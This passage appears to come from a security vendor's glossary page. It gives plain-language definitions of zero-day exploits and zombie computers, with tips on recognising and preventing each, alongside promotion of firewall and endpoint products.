How to Prevent This Threat: Train yourself and your users in safe email and web browsing techniques, with regular alerts for the latest types of threats. Enable auto-updates or set reminders keep up with the latest security patches. But the human element will always be present, and hackers are crafty, so you’ll need another layer of defense. Firewalls complete with security services subscriptions can keep vulnerabilities from affecting your organization. Visit our Promos page for the latest deals on firewall bundles
What is a Zero-Day Exploit?
Zero-day exploits target software or application vulnerabilities that the vendor is not yet aware of or hasn’t yet acknowledged, which means there is no patch immediately available. The hacker is generally the only one aware of the existence of these types of vulnerabilities. Day zero refers to the day a vendor becomes aware of a given vulnerability and starts developing a patch.
How to Recognize This Threat: Machine learning that establishes baselines for normal system behavior and creates signatures for known malware to detect when something is awry. Additionally, analyzing software interactions for abnormal behavior that could be a result of malware.
How to Prevent This Threat: Ensure your computers (including OS and all applications) are fully patched, and you have active antivirus or endpoint security. See the options from Sophos and SonicWall to secure your endpoint.
What is a Zombie?
A zombie is a computer or device infected with malware that is controlled remotely by a hacker. Zombies may be used to launch online attacks or send spam or phishing emails to infect other devices. A large group of these zombies is known as a botnet.
How to Recognize This Threat: The primary sign of zombie computers is especially slow performance. They can also be turned on remotely by the hacker controlling them, so computers running more than normal may be another signal.
How to Prevent This Threat: Avoid downloading files you’re unsure of, and keep your network protected from online threats with a firewall that’s outfitted with email and web security. Find the firewall that’s right for you.